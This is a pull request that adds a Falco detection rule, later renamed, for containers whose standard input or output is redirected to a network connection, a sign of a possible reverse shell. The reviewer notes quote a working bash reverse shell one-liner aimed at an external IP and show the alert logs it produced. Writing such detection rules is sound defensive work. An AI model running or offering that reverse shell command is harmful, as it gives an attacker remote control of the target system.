### PR TITLE
rule update: add a rule to detect reverse shell

### DIFF
--- a/rules/falco_rules.yaml
+++ b/rules/falco_rules.yaml
@@ -2795,7 +2795,12 @@
   priority: WARNING
   tags: [network]
 
-
+- rule: Reverse shell
+  desc: Detect reverse shell established remote connection in container.
+  condition: evt.type=dup and evt.dir=> and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
+  output: >
+    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
+  priority: WARNING
 
 # Application rules have moved to application_rules.yaml. Please look
 # there if you want to enable them by adding to

--- a/rules/falco_rules.yaml
+++ b/rules/falco_rules.yaml
@@ -2795,11 +2795,11 @@
   priority: WARNING
   tags: [network]
 
-- rule: Reverse shell
-  desc: Detect reverse shell established remote connection in container.
+- rule: Redirect stdout/stdin to network connection in container 
+  desc: Detect redirecting stdout/stdin to network connection in container (potential reverse shell).
   condition: evt.type=dup and evt.dir=> and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
   output: >
-    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
+    Redirect stdout/stdin to network connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
   priority: WARNING
 
 # Application rules have moved to application_rules.yaml. Please look


### PR DESCRIPTION
Signed-off-by: kaizhe <derek0405@gmail.com>

<!--  Thanks for sending a pull request!  Here are some tips for you:

1. If this is your first time, please read our contributor guidelines in the [CONTRIBUTING.md](CONTRIBUTING.md) file and learn how to compile Falco from source [here](https://falco.org/docs/source).
2. Please label this pull request according to what type of issue you are addressing.
3. . Please add a release note!
4. If the PR is unfinished while opening it specify a wip in the title before the actual title, for example, "wip: my awesome feature"
-->

**What type of PR is this?**

> Uncomment one (or more) `/kind <>` lines:

> /kind bug

> /kind cleanup

> /kind design

> /kind documentation

> /kind failing-test

> /kind feature

> If contributing rules or changes to rules, please make sure to also uncomment one of the following line:

> /kind rule-update

 /kind rule-create

<!--
Please remove the leading whitespace before the `/kind <>` you uncommented.
-->

**Any specific area of the project related to this PR?**

> Uncomment one (or more) `/area <>` lines:

> /area build

> /area engine

> /area examples

 /area rules

> /area integrations

> /area tests

> /area proposals

<!--
Please remove the leading whitespace before the `/area <>` you uncommented.
-->

**What this PR does / why we need it**:
Detect reverse shell connection from a container.

**Which issue(s) this PR fixes**:

<!--
Automatically closes linked issue when PR is merged.
Usage: `Fixes #<issue number>`, or `Fixes (paste link of issue)`.
If PR is `kind/failing-tests` or `kind/flaky-test`, please post the related issues/tests in a comment and do not use `Fixes`.
-->

Fixes #

**Special notes for your reviewer**:
`/bin/bash -i >& /dev/tcp/34.204.xxx.xxx/1234 0>&1`  -- reverse shell execution

```
18:27:10.379958969: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
18:27:10.379959879: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
```

**Does this PR introduce a user-facing change?**:

<!--
If no, just write "NONE" in the release-note block below.
If yes, a release note is required:
Enter your extended release note in the block below.
If the PR requires additional action from users switching to the new release, prepend the string "action required:".
For example, `action required: change the API interface of the rule engine`.
-->

```release-note
rule created: Redirect stdout/stdin to network connection in container

```
